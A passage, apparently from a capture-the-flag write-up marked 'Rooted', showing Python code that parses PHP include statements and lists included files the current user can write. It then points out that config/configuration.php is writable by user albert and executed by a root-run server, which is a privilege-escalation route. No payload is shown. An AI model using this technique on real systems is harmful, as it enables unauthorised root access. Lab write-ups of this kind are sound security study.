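    are reported rather than silently skipped."""
    literals, expressions = [], []
    for m in _INCLUDE_RE.finditer(php_source):
        arg = m.group(1)
        lit = _LITERAL_RE.match(arg)
        if lit:
            literals.append(lit.group(2))
        else:
            expressions.append(arg)
    return {"literals": literals, "expressions": expressions}


def writable_includes(php_file: Path) -> list:
    """Literal include targets, resolved relative to the script's directory
    (where PHP looks after include_path), that this user could modify."""
    hits = []
    for rel in find_includes(php_file.read_text())["literals"]:
        target = php_file.parent / rel
        if target.exists() and os.access(target, os.W_OK):
            hits.append(target)
    return hits


def demo() -> dict:
    """Constructed copy of the /opt/website-monitor layout (not the real
    files): index.php includes config/configuration.php, which we can write."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "config").mkdir()
        cfg = root / "config" / "configuration.php"
        cfg.write_text("<?php\ndefine('PATH', '/opt/website-monitor');\n")  # guessed body
        index = root / "index.php"
        index.write_text(
            "<?php\n\ninclude('config/configuration.php');\n"
            "include(PATH.'/Parsedown.php');\n"
        )
        return {
            "parsed": find_includes(index.read_text()),
            "writable": [str(h.relative_to(root)) for h in writable_includes(index)],
        }


if __name__ == "__main__":
    print(demo())
```

Run against the real /opt/website-monitor/index.php as albert, the same check reports config/configuration.php, which is exactly the file the root-run server will execute.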

Rooted


Last update: 2025-04-24 Created: 2024-12-12